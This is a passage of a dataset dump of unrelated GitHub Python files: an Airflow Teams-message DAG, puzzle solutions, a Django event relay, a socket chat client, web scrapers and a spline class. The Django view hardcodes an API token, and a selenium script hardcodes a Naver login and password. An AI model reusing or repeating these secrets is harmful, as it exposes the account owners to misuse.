['yes', 'no']\ncountries_fullname = [\"'United States'\", \"'South Korea'\", 
\"'Brazil'\"]\ncountries_shortname = [\"'us'\", \"'kr'\", \"'br'\"]\ncolor = ['0067a3', 'ffffff', '008000']\nsupersets = ['', '',\n '']\nrepetition_number = len(countries_fullname)\n\nis_oclock = BranchPythonOperator(\n task_id='check_is_oclock',\n provide_context=True,\n python_callable=which_path,\n dag=dag\n)\nsend_message_longterm = PythonOperator(\n task_id='send_message_longterm',\n provide_context=True,\n python_callable=make_teams_message_country_longterm.get_message,\n op_kwargs={'countries_fullname': countries_fullname, 'countries_shortname': countries_shortname,\n 'repetition_number': repetition_number, 'supersets': supersets, 'countries': countries, 'color': color},\n dag=dag\n)\n\nis_tri_week = BranchPythonOperator(\n task_id='is_tri_week',\n provide_context=True,\n python_callable=check_tri_week,\n dag=dag\n)\n\nsend_message_daily = PythonOperator(\n task_id='send_message_daily',\n provide_context=True,\n python_callable=make_teams_message_country_daily.get_message,\n op_kwargs={'countries_fullname': countries_fullname, 'countries_shortname': countries_shortname,\n 'repetition_number': repetition_number, 'supersets': supersets, 'countries': countries, 'color': color},\n dag=dag\n)\n\nfinish_send_long_term = DummyOperator(\n task_id='finish_send_long_term',\n trigger_rule='one_success',\n dag=dag)\nfinish_send = DummyOperator(\n task_id='finish_send',\n trigger_rule='none_failed',\n dag=dag)\nend_job = DummyOperator(\n task_id='work_done',\n trigger_rule='one_success',\n dag=dag)\n\nfor yesorno in is_tri:\n t = DummyOperator(\n task_id=yesorno,\n dag=dag\n )\n if yesorno == 'yes':\n is_tri_week >> t >> send_message_longterm >> finish_send_long_term\n else:\n is_tri_week >> t >> finish_send_long_term\n\nfor option in options:\n t = DummyOperator(\n task_id=option,\n dag=dag\n )\n if option == 'upload':\n is_oclock >> t >> [is_tri_week, send_message_daily]\n else:\n is_oclock >> t >> end_job\n\nsuspend = SnowflakeOperator(\n task_id='suspend',\n 
snowflake_conn_id='snowflake_chequer',\n sql=\"\"\"alter warehouse airflow_warehouse suspend\"\"\",\n autocommit=True,\n trigger_rule='none_failed',\n dag=dag\n)\nfinish = DummyOperator(\n task_id='finish',\n trigger_rule='none_skipped',\n dag=dag)\n\n[finish_send_long_term, send_message_daily] >> finish_send >> end_job\nend_job >> suspend >> finish\n","repo_name":"roganOh/portfolio","sub_path":"chequer/chequerETL/run_dags/teams_webhook_country.py","file_name":"teams_webhook_country.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"16423598977","text":"# https://inf-ege.sdamgia.ru/problem?id=35482\n\"\"\" найти строку, содержащую наименьшее количество букв G если \nтаких строк неск, надо взять ту, которая находится в файле раньше, \nи определить, какая буква встречается в этой строке чаще всего. \nЕсли таких букв неск, надо взять ту, котор позже стоит в алфав\"\"\"\n\nf = open(\"24_35482.txt\")\nmin_s, min_g = \"\", 999999999\nfor s in f:\n if s.count(\"G\") < min_g:\n min_g = s.count(\"G\")\n min_s = s\nf.close()\n\nalp = [chr(65+i) for i in range(26)][::-1]\nmx_smb, cnt = \" \", 0\nfor smb in alp:\n if min_s.count(smb) > cnt:\n cnt = min_s.count(smb)\n mx_smb = smb\nprint(cnt, mx_smb)\n","repo_name":"permCoding/ege-21-22","sub_path":"tasks/task24/24_35482.py","file_name":"24_35482.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25656128212","text":"import logging\n\nimport requests\nfrom django.http.response import JsonResponse\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom master_sniffer.serializers import TrackingEventSerializer\nfrom master_sniffer.models import TrackingEvent\nfrom master_sniffer.apps import WEB_SERVER_URL\nfrom Pawfiguration import 
REQUEST_QUEUE\nfrom requests import Request\nfrom datetime import timedelta\n\n@api_view(['GET', 'PUT'])\ndef list_events(request):\n\n if request.method == 'GET':\n return JsonResponse(data={\"status\": status.HTTP_501_NOT_IMPLEMENTED},status=status.HTTP_501_NOT_IMPLEMENTED)\n\n elif request.method == 'PUT':\n logging.info('Received tracking event!!')\n serializer = TrackingEventSerializer(data=request.data)\n if serializer.is_valid():\n\n #sniffer_query = Device.objects.filter(serial_num = event.sniffer_serial, active=True)\n\n # Make sure we don't receive repeat request\n '''\n prev_event = TrackingEvent.objects\\\n .filter(beacon_addr=serializer.validated_data['beacon_addr'])\\\n .order_by('event_time')[0]\n '''\n event = serializer.create(serializer.validated_data)\n logging.info('Tracking event from %s created! Beacon MAC %s detected.', event.sniffer_serial,\n event.beacon_addr)\n event.save()\n req = requests.request(\n method='POST',\n url='https://pawpharos.com/api/events/',\n json={\n 'sniffer_serial': event.sniffer_serial,\n 'beacon_addr': event.beacon_addr,\n 'event_time': event.event_time.isoformat(),\n 'rssi': event.rssi\n },\n headers={\n 'Authorization': 'Token 393be039779f7799ea090b6d5006ed5980b3c7e5',\n 'Host': 'pawpharos.com'\n }\n )\n logging.info('Request sent to server with response code %d.', req.status_code)\n # Then queue this event to get pushed to the webserver\n # REQUEST_QUEUE.put_nowait(req)\n return JsonResponse(serializer.data, content_type='application/json', status=status.HTTP_201_CREATED)\n '''\n if all([prev_event.sniffer_serial == serializer.validated_data['sniffer_serial'],\n (serializer.validated_data['event_time'] - prev_event.event_time) < timedelta(minutes=5)]):\n \n else:\n logging.info('Duplicate event detected, ignoring!')\n return JsonResponse(serializer.data, status=status.HTTP_208_ALREADY_REPORTED)\n '''\n\n return JsonResponse(serializer.errors, 
status=status.HTTP_400_BAD_REQUEST)","repo_name":"PKmnman/SnifferConfig","sub_path":"master_sniffer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43173523874","text":"#!/usr/bin/env python\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"days\", nargs=\"+\", type=int)\nargs = parser.parse_args()\n\nfrom pathlib import Path\nfrom subprocess import run\n\n\ndef main(args):\n for day in args.days:\n file = Path(f\"py/{day}.py\")\n if file.exists():\n print(f\"Advent of Code, Day {day:02d}\")\n run([\"python\", file])\n print(f\"----------------------\")\n\n\nif __name__ == \"__main__\":\n main(args)\n","repo_name":"nbiederbeck/adventofcode2022","sub_path":"aoc.py","file_name":"aoc.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7991358119","text":"while True:\n try:\n h, m = input().split()\n\n hours = int(h) / 30\n minutes = int(m) / 6\n\n hours, minutes = str(int(hours)), str(int(minutes))\n\n print(f'{hours.zfill(2)}:{minutes.zfill(2)}')\n \n except EOFError:\n break","repo_name":"gustavonikov/URI_problems","sub_path":"URI 3084 - Old clock.py","file_name":"URI 3084 - Old clock.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23719298620","text":"from gocept.amqprun.writefiles import FileWriter\nimport Queue\nimport gocept.amqparchive.interfaces\nimport gocept.amqparchive.xml\nimport logging\nimport multiprocessing\nimport optparse\nimport os.path\nimport pyes\nimport time\nimport zope.component\nimport zope.xmlpickle\n\n\nlog = logging.getLogger(__name__)\n\n\ndef reindex_file(path, base):\n log.info(path)\n\n if not base.endswith('/'):\n base += '/'\n body = open(path, 
'r').read()\n data = dict(\n path=path.replace(base, ''),\n data=gocept.amqparchive.xml.jsonify(body),\n )\n directory = os.path.dirname(path)\n filename = os.path.basename(path)\n header_file = os.path.join(directory, FileWriter.header_filename(filename))\n header = zope.xmlpickle.loads(open(header_file).read())\n data.update(header.__dict__)\n\n elastic = zope.component.getUtility(\n gocept.amqparchive.interfaces.IElasticSearch)\n elastic.index(data, 'queue', 'message')\n\n\ndef collect_message_files(path):\n for (dirpath, dirnames, filenames) in os.walk(path):\n for f in filenames:\n if f.startswith('.'):\n # skip hidden files\n continue\n f = os.path.join(dirpath, f)\n if not FileWriter.is_header_file(f):\n yield f\n for d in dirnames:\n collect_message_files(os.path.join(dirpath, d))\n\n\ndef reindex_directory(path, base):\n if base is None:\n base = path\n files = collect_message_files(path)\n for f in files:\n try:\n reindex_file(f, base)\n except Exception:\n log.error('Error reindexing %s', f, exc_info=True)\n\n\ndef reindex_directory_parallel(path, base, jobs):\n if base is None:\n base = path\n queue = multiprocessing.JoinableQueue()\n done = multiprocessing.Event()\n collect = multiprocessing.Process(\n target=worker_collect_files, args=(queue, path))\n collect.start()\n\n workers = []\n for i in range(jobs):\n job = multiprocessing.Process(\n target=worker_reindex_file, args=(queue, done, base))\n job.start()\n workers.append(job)\n\n collect.join()\n done.set()\n queue.join()\n\n\ndef worker_collect_files(queue, path):\n files = collect_message_files(path)\n for f in files:\n queue.put(f)\n\n\ndef worker_reindex_file(queue, done, base):\n while True:\n try:\n f = queue.get(False)\n except Queue.Empty:\n if done.is_set():\n break\n else:\n log.debug('Waiting 1s for more work')\n time.sleep(1)\n continue\n\n try:\n reindex_file(f, base)\n except Exception:\n log.error('Error reindexing %s', f, exc_info=True)\n queue.task_done()\n\n\ndef 
delete_index(name):\n elastic = zope.component.getUtility(\n gocept.amqparchive.interfaces.IElasticSearch)\n elastic.delete_index(name)\n\n\ndef main(argv=None):\n o = optparse.OptionParser(\n prog='reindex_directory',\n description='Read archived message files into elasticsearch index',\n usage='%prog [-d] [-jX] -h host:port directory')\n o.add_option(\n '-d', '--delete', action='store_true',\n help='delete index first')\n o.add_option(\n '-c', '--connection',\n help='hostname and port of the elasticsearch server')\n o.add_option(\n '-j', '--jobs', default='1',\n help='amount of worker processes')\n o.add_option(\n '-b', '--basedir', default=None,\n help='index filenames relative to this directory')\n\n options, arguments = o.parse_args(argv)\n if len(arguments) != 1:\n o.error('must specify a directory')\n\n if not options.connection:\n o.error('elasticsearch server name is required')\n\n logging.basicConfig(\n level=logging.ERROR,\n format='%(asctime)s [%(levelname)s] %(message)s')\n log.setLevel(logging.INFO)\n\n es = pyes.ES(options.connection)\n zope.component.provideUtility(\n es, gocept.amqparchive.interfaces.IElasticSearch)\n\n if options.delete:\n log.info('deleting index \"queue\"')\n delete_index('queue')\n\n jobs = int(options.jobs)\n if jobs == 1:\n reindex_directory(arguments[0], options.basedir)\n else:\n reindex_directory_parallel(arguments[0], jobs, options.basedir)\n","repo_name":"gocept/gocept.amqparchive","sub_path":"src/gocept/amqparchive/reindex.py","file_name":"reindex.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71538157159","text":"#https://github.com/samuhay/Python-Chat-App/tree/master\r\nfrom socket import AF_INET, socket, SOCK_STREAM\r\nfrom threading import Thread\r\nimport tkinter\r\nimport tkinter as tk\r\nfrom winsound import *\r\n\r\n#Mac Kullanıyorsanız python üzerinden pygame kullanmanız tercih edilir\r\n\"\"\"\r\nsudo 
pip install pygame (Terminal ile yükleyin)\r\nimport pygame\r\npygame.init()\r\npygame.mixer.init()\r\nsounda= pygame.mixer.Sound(\"A-Computer Error.wav\")\r\nsounda.play()\r\n\"\"\"\r\n\r\ndef receive():\r\n \"\"\"Gelen mesajlarla ilgili foksiyon.\"\"\"\r\n counter=0\r\n while True:\r\n try:\r\n counter+=1\r\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\r\n msg_list.insert(tkinter.END, msg)\r\n if counter > 3:\r\n song_id = msg.split(\":\")[1]\r\n if song_id ==\" {ses1}\":\r\n PlaySound(\"A-Computer Error\", SND_FILENAME)\r\n if song_id ==\" {ses2}\":\r\n PlaySound(\"a-ice-cubes-glass-daniel_simon\", SND_FILENAME)\r\n if song_id ==\" {ses3}\":\r\n PlaySound(\"Air Plane Ding-Sound\", SND_FILENAME)\r\n if song_id ==\" {ses4}\":\r\n PlaySound(\"a-service-bell_daniel_simion\", SND_FILENAME)\r\n if song_id ==\" {ses5}\":\r\n PlaySound(\"A-Tone-His_Self\", SND_FILENAME)\r\n except OSError: # Kullanıcının sohbeti terk etme durumu.\r\n break\r\n\r\ndef send(event=None): # Event binder ile gönderme işlemi.\r\n \"\"\"Mesaj gönderme kısımı.\"\"\"\r\n msg = my_msg.get()\r\n my_msg.set(\"\") # Mesaj gönderdikten sonra inputu temizleme.\r\n client_socket.send(bytes(msg, \"utf8\"))\r\n if msg == \"{quit}\":#çıkış komutu sohbetten ayrılma bağlantı kesme\r\n client_socket.close()\r\n top.quit()\r\n\r\ndef play(id):\r\n if id == 1:\r\n tag = \"{ses1}\"\r\n client_socket.send(bytes(tag,\"utf8\"))\r\n return PlaySound(\"A-Computer Error\", SND_FILENAME)\r\n if id == 2:\r\n tag = \"{ses2}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"a-ice-cubes-glass-daniel_simon\", SND_FILENAME)\r\n if id == 3:\r\n tag = \"{ses3}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"Air Plane Ding-Sound\", SND_FILENAME)\r\n if id == 4:\r\n tag = \"{ses4}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"a-service-bell_daniel_simion\", SND_FILENAME)\r\n if id == 5:\r\n tag = \"{ses5}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n 
return PlaySound(\"A-Tone-His_Self\", SND_FILENAME)\r\n\r\ndef on_closing(event=None):\r\n \"\"\"Sohbet ekranı kapanırken çalışır.\"\"\"\r\n my_msg.set(\"{quit}\")\r\n send()\r\n\r\ndef create_window():\r\n \"\"\"Ses butonunu ekrana eklemek için gerekli kısım\"\"\"\r\n window = tk.Toplevel(top)\r\n window.title('Sound')\r\n window.geometry('300x50')\r\n sound1 = tk.Button(window,text=\"1\", command=lambda: play(1)).pack(side=tk.LEFT)\r\n sound2 = tk.Button(window, text=\"2\", command=lambda: play(2)).pack(side=tk.LEFT)\r\n sound3 = tk.Button(window, text=\"3\", command=lambda: play(3)).pack(side=tk.LEFT)\r\n sound4 = tk.Button(window, text=\"4\", command=lambda: play(4)).pack(side=tk.LEFT)\r\n sound5 = tk.Button(window, text=\"5\", command=lambda: play(5)).pack(side=tk.LEFT)\r\n\r\ntop = tkinter.Tk()\r\ntop.geometry(\"340x500\")\r\ntop.title(\"CS 364 APP\")\r\n\r\nmessages_frame = tkinter.Frame(top)\r\n\r\nscrollbar = tkinter.Scrollbar(messages_frame) # Mesaj kutusu içinde gezinme için scrollbar.\r\n# Mesaj kutusu ayarları.\r\nmsg_list = tkinter.Listbox(messages_frame, height=28, width=51, yscrollcommand=scrollbar.set)\r\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\nmsg_list.pack()\r\nmessages_frame.pack()\r\n\r\nmy_msg = tkinter.StringVar()# Gönderilecek mesaj kısımı\r\nmy_msg.set(\"Adınız:\")\r\n\r\nentry_field = tkinter.Entry(top, textvariable=my_msg, width=50) #Mesaj butonu\r\nentry_field.bind(\"\", send)\r\nentry_field.pack()\r\nsend_button = tkinter.Button(top, text=\"Gönder\", command=send)\r\nsend_button.pack(side=tk.LEFT)\r\n\r\n\r\n#sound\r\nsound_button=tk.Button(top,text='Sound',command=create_window)\r\nsound_button.pack(in_=top, side=tk.LEFT)\r\n\r\n\r\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\n\r\n#----Now comes the sockets part----\r\nHOST = input('HOST: ')\r\nPORT = input('PORT: ')\r\nif not PORT: #Port belirtilmezse sabit port\r\n PORT = 1234\r\nelse:\r\n PORT = 
int(PORT)\r\n\r\nBUFSIZ = 1024\r\nADDR = (HOST, PORT)\r\n\r\nclient_socket = socket(AF_INET, SOCK_STREAM)\r\nclient_socket.connect(ADDR)\r\n\r\nreceive_thread = Thread(target=receive)\r\nreceive_thread.start()\r\ntkinter.mainloop()\r\n","repo_name":"caferyukseloglu/Python-Chat-App","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27500018220","text":"# Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nimport pandas as pd\nimport datetime as dt\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\ndef scrape_all():\n # Initiate headless driver for deployment\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=True)\n\n news_title, news_paragraph = mars_news(browser)\n\n img_dic = img_scrape(browser)\n\n # Run all scraping functions and store results in a dictionary\n data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image(browser),\n \"facts\": mars_facts(),\n \"last_modified\": dt.datetime.now(),\n \"img_list\": img_dic\n }\n\n # Stop webdriver and return data\n browser.quit()\n return data\n\n\ndef mars_news(browser):\n\n # Scrape Mars News\n # Visit the mars nasa news site\n url = 'https://data-class-mars.s3.amazonaws.com/Mars/index.html'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('div.list_text', wait_time=10)\n\n # Convert the browser html to a soup object and then quit the browser\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n # Add try/except for error handling\n try:\n slide_elem = news_soup.select_one('div.list_text')\n # Use the parent element to find the first 'a' tag and save it as 'news_title'\n news_title = slide_elem.find('div', 
class_='content_title').get_text()\n # Use the parent element to find the paragraph text\n news_p = slide_elem.find('div', class_='article_teaser_body').get_text()\n\n except AttributeError:\n print(\"Error in Mars_News Collection\")\n return None, None\n\n return news_title, news_p\n\n\ndef featured_image(browser):\n # Visit URL\n url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('button', wait_time=10)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_tag('button')[1]\n full_image_elem.click()\n\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n\n # Add try/except for error handling\n try:\n # Find the relative image url\n img_url_rel = img_soup.find('img', class_='headerimage fade-in').get('src')\n\n except AttributeError as e:\n print(f\"Error in Featured_Image Collection \\n\\n {e}\")\n return None\n\n # Use the base url to create an absolute url\n img_url = f'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/{img_url_rel}'\n\n return img_url\n\ndef mars_facts():\n # Add try/except for error handling\n try:\n # Use 'read_html' to scrape the facts table into a dataframe\n df = pd.read_html('https://data-class-mars-facts.s3.amazonaws.com/Mars_Facts/index.html')[0]\n\n except BaseException as e:\n print(f\"----Error in Mars_Facts Collection ---- \\n\\n{e}\")\n return None\n\n # Assign columns and set index of dataframe\n df.columns=['Description', 'Mars', 'Earth']\n df.set_index('Description', inplace=True)\n\n # Convert dataframe into HTML format, add bootstrap\n return df.to_html()\n\ndef img_scrape(browser):\n # 1. Use browser to visit the URL \n url = 'https://marshemispheres.com/'\n browser.visit(url)\n\n # 2. Create a list to hold the images and titles.\n hemisphere_image_urls = []\n\n # 3. 
Write code to retrieve the image urls and titles for each hemisphere.\n # Loop once for each hemisphere\n for x in range(4):\n \n # Find the click on the Image Link\n imgs = browser.find_by_css(\"img.thumb\", wait_time=3)[x]\n imgs.click()\n \n # Parse browser HTML and drill down to find the HREF of the \"Sample\" link\n html = browser.html\n img_soup = soup(html, 'html.parser')\n img_url_rel = img_soup.find(\"div\", class_=\"downloads\").ul.li.a.get('href')\n \n # Store the URL for the high-def picture\n img_url = f'https://marshemispheres.com/{img_url_rel}'\n \n # Find and store the Title for the picture\n img_title = img_soup.find(\"div\", class_=\"cover\").h2.text\n\n # Append the URL and Title to our hemisphere_image_urls list\n hemisphere_image_urls.append(\n {\n 'img_url': img_url,\n 'title': img_title\n }\n )\n \n # Visit the original site for further processing\n browser.visit(url)\n\n # Return the hemisphere images list\n return hemisphere_image_urls\n\nif __name__ == \"__main__\":\n\n # If running as script, print scraped data\n print(scrape_all())","repo_name":"Jamesrx33/Mission-to-Mars","sub_path":"Module Files/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3463972526","text":"from point import *\r\nfrom random import randint\r\nfrom rectangle import *\r\n\r\nrectanglex = Rectangle(Point(randint(0,9),randint(0,9)),Point(randint(0,9),randint(0,9)))\r\nprint(\"The rectangle coordinates are: ({},{}),({},{})\".format(rectanglex.lowleft.x,rectanglex.lowleft.y,rectanglex.upright.x,rectanglex.upright.y))\r\nrectanglex.length_of_rectangle()\r\nrectanglex.area_of_the_rectangle()\r\nx,y = input(\"Please provide a point x and y: \").split()\r\npoint = Point(int(x),int(y))\r\nif point.falls_in_rectangle(rectanglex):\r\n print(\"The point:({},{}) is inside the rectangle\".format(point.x,point.y))\r\nelse:\r\n print(\"The 
point:({},{}) is outside the rectangle\".format(point.x,point.y))\r\n\r\n\r\n","repo_name":"manasakorukonda/All-Projects","sub_path":"python/geometry Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3466692116","text":"import sys\nimport io\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.chrome.options import Options\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = \"utf-8\")\n\nclass ncafewrite:\n def __init__(self):\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n self.driver = webdriver.Chrome(chrome_options=chrome_options,executable_path=\"C:/Users/moon2/Desktop/file/py/s3/webdriver/chromedriver\")\n\n\n def writeattendcheck(self):\n self.driver.get('https://nid.naver.com/nidlogin.login?mode=form&url=https%3A%2F%2Fwww.naver.com')\n self.driver.find_element_by_name('id').send_keys('moon20517')\n self.driver.find_element_by_name('pw').send_keys('Ansc112!')\n self.driver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\n self.driver.implicitly_wait(30)\n self.driver.get('https://cafe.naver.com/AttendanceView.nhn?search.clubid=10121064&search.menuid=494')\n self.driver.implicitly_wait(30)\n self.driver.switch_to_frame('cafe_main')\n self.driver.find_element_by_id('cmtinput').send_keys('hi')\n self.driver.find_element_by_xpath('//*[@id=\"btn-submit-attendance\"]').click()\n time.sleep(3)\n def __del__(self):\n self.driver.quit()\n\n\nif __name__ == '__main__':\n a =ncafewrite()\n start_time = time.time()\n a.writeattendcheck()\n del a\n","repo_name":"CAHNGKI/py","sub_path":"s3/3-10.py","file_name":"3-10.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"17092956979","text":"from PyQt4 import QtCore, QtGui\n\ndef gui_fname(dir=None, index=0):\n \"\"\"Select a file via a dialog and returns the file name.\n \"\"\"\n if dir is None: dir ='./'\n message = \"Select Folder #%d\" %index\n dir_name = QtGui.QFileDialog.getExistingDirectory(None, message,\n dir,\n QtGui.QFileDialog.ShowDirsOnly)\n return dir_name\n\n\ndef gui_output_folder(dir=None):\n \"\"\"Select a folder\n \"\"\"\n if dir is None: dir ='./'\n dir_name = QtGui.QFileDialog.getExistingDirectory(None, \"Select Folder ...\",\n dir,\n QtGui.QFileDialog.ShowDirsOnly)\n return dir_name\n","repo_name":"JeanBilheux/python_101","sub_path":"users_notebooks/combine/widgets_handler.py","file_name":"widgets_handler.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"25271633060","text":"import plistlib\n\n\ndef write(nksf, filename):\n vendors = {\n 'Arturia': ('Artu', 'Controller State'), # 1098019957\n 'Waldorf': ('3E00', 'Processor State'), # 860172336\n }\n manufacturer, field = vendors[nksf['NISI']['vendor']]\n plist = {\n field: nksf['PCHK'],\n 'manufacturer': int(manufacturer.encode('ascii').hex(), base=16),\n 'subtype': nksf['PLID']['VST.magic'],\n 'type': int(b'aumu'.hex(), base=16), # 1635085685\n 'version': 0,\n 'name': nksf['NISI']['name'],\n }\n with open(filename, 'wb') as f:\n plistlib.dump(plist, f, fmt=plistlib.FMT_XML)\n","repo_name":"mkuron/aupreset-generator","sub_path":"aupreset_generator/aupreset.py","file_name":"aupreset.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7765279841","text":"#9am-5pm\n#water - water.mp3 (3.5 li) - drag -log\n#eyes - eyes.mp3 - every 30 mins - eydone\n#yoga - yoga.mp3 - 45mins - exdone\n\nfrom time import time\nfrom pygame import mixer\nimport datetime\n\ndef sound(filename,put):\n mixer.init()\n 
mixer.music.load(filename)\n mixer.music.play()\n while True:\n s = input(\"Please give input = \")\n if s==put:\n mixer.music.stop()\n break\n\ndef file_c(m):\n with open(\"log.txt\",\"a\") as f:\n s = f.write(f\"{datetime.now()} : {m}\\n\")\n print(s)\n \n\n\nif __name__==\"__main__\":\n water_t=time()\n eyes_t=time()\n yoga_t=time()\n wd=5\n ed=10\n yd=15\n while True:\n if time() - water_t > wd:\n sound(\"water.mp3\",\"stop\")\n file_c(\"drink water\")\n if time() - eyes_t > ed:\n sound(\"eyes.mp3\",\"stop\")\n file_c(\"cool eyes\")\n if time() -yoga_t > yd:\n sound(\"yoga.mp3\",\"stop\")\n file_c(\"go to yoga\")\n break\n\n\n\n\n\n\n","repo_name":"sandipchatterjee540/python-project","sub_path":"healthy_programer/healthy_programer.py","file_name":"healthy_programer.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11517582356","text":"def subsets_iterative(nums):\n \"\"\"\n Iteratively update\n Time: O(n * 2^n)\n Space: O(1) res not included\n \"\"\"\n res = [[]]\n for num in nums:\n # for every new number, create a copy of the current res,\n # and append num to every list in the copy\n res += [curr + [num] for curr in res]\n return res\n\n\ndef subsets(nums):\n \"\"\"\n Backtracking\n Time: O(n * 2^n) 2^n, number of subsets of nums (each element can either be in or out of a subset)\n n, the time to copy the solution to res\n Space: O(n) the recursion stack and curr_res (res not included)\n \"\"\"\n res = []\n\n def backtrack(start, curr_res):\n # unlike combination, where we append only when we are at the bottom layer\n # for subsets we append each node in the recursion tree (we can guarantee there are no repetitions)\n # make a copy of curr_res since we will pop its last element upon return to the previous layer\n res.append(curr_res[:])\n for i in range(start, len(nums)):\n curr_res.append(nums[i])\n # this search guarantees we won't have any repetition\n 
backtrack(i + 1, curr_res)\n # pop out so that the next element can join (same level)\n curr_res.pop()\n\n backtrack(0, [])\n return res\n\n\ntest = [1, 2, 4]\nprint(subsets_iterative(test))\n","repo_name":"filozyu/leetcode-journey","sub_path":"src/backtracking/subsets.py","file_name":"subsets.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22970709274","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nimport numpy as np\nimport rospkg\nimport math\nimport time\nfrom ackermann_msgs.msg import AckermannDriveStamped\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Path\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import Float32, UInt32, Bool\nfrom std_msgs.msg import Int32MultiArray\nfrom sensor_msgs.msg import NavSatFix\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom gps_common import *\nimport copy\nfrom math import *\n\n\nimport matplotlib.pyplot as plt\nimport sys\n\nimport bisect\n\nsys.path.append(\"/home/mds/catkin_ws/src/autonomous-vehicle-MDS/stauto_control/src\")\n\nclass Spline:\n\n\n def __init__(self, x, y):\n self.b, self.c, self.d, self.w = [], [], [], []\n\n self.x = x\n self.y = y\n\n self.nx = len(x) # dimension of x\n h = np.diff(x)\n\n # calc coefficient c\n self.a = [iy for iy in y]\n\n # calc coefficient c\n A = self.__calc_A(h)\n B = self.__calc_B(h)\n self.c = np.linalg.solve(A, B)\n # print(self.c1)\n\n # calc spline coefficient b and d\n for i in range(self.nx - 1):\n self.d.append((self.c[i + 1] - self.c[i]) / (3.0 * h[i]))\n tb = (self.a[i + 1] - self.a[i]) / h[i] - h[i] * \\\n (self.c[i + 1] + 2.0 * self.c[i]) / 3.0\n self.b.append(tb)\n\n def calc(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = 
